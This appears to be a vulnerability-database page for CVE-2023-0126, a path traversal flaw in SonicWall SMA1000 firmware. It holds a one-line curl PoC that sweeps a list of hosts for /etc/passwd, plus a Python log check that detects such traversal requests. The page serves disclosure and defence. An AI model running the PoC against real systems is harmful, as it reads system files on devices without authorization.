Attacker Value: High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2023-0126

Disclosure Date: January 19, 2023

Description

Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.

Technical Analysis

SonicWall Secure Mobile Access (SMA) 1000 series contains a pre-authentication path traversal vulnerability. This flaw could potentially allow an unauthenticated attacker to access files and directories stored outside the web root directory.

This vulnerability could enable an attacker to traverse the file system and gain unauthorized access to sensitive files and directories. Note: this vulnerability solely affects SMA 1000 firmware version 12.4.2.

PoC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "Vulnerable";done
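
Added example, not part of the assessment above and not SonicWall code: a Python check that flags logged requests whose path, after percent-decoding and collapsing repeated slashes, climbs above the server root, which is the shape of the `/images/` request in the PoC. The combined access-log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Jan/2023:10:00:01 +0000] "GET /images/logo.png HTTP/1.1" 200 5120
192.0.2.44 - - [20/Jan/2023:10:00:02 +0000] "GET /images//////../../../etc/passwd HTTP/1.1" 200 1843
192.0.2.44 - - [20/Jan/2023:10:00:03 +0000] "GET /images/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 404 0
192.0.2.51 - - [20/Jan/2023:10:00:04 +0000] "GET /images/..%252f..%252f..%252fetc/passwd HTTP/1.1" 200 1843
192.0.2.10 - - [20/Jan/2023:10:00:05 +0000] "GET /images/icons/../logo.png?v=../2 HTTP/1.1" 200 5120
"""
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')

def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so double-encoded '%252f' is also exposed."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def levels_above_root(target):
    """Number of directory levels the request path climbs above '/' (0 = none)."""
    path = decode_fully(target.split("?", 1)[0]).replace("\\", "/")
    depth = lowest = 0
    for segment in path.split("/"):
        if segment in ("", "."):  # runs of '/' and '.' leave depth unchanged
            continue
        depth += -1 if segment == ".." else 1
        lowest = min(lowest, depth)
    return -lowest

def find_traversal(log_text):
    """Return (client, status, levels, raw_target) for each escaping request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        levels = levels_above_root(target)
        if levels > 0:
            hits.append((client, status, levels, target))
    return hits

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(*hit)
```

A flagged request that was answered with status 200 is the one to review first, since file content may have been returned to the client.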

CVSS V3 Severity and Metrics
Base Score: 7.5 High
Impact Score: 3.6
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): None
Availability (A): None

General Information

Vendors

  • sonicwall

Products

  • sma1000 firmware 12.4.2
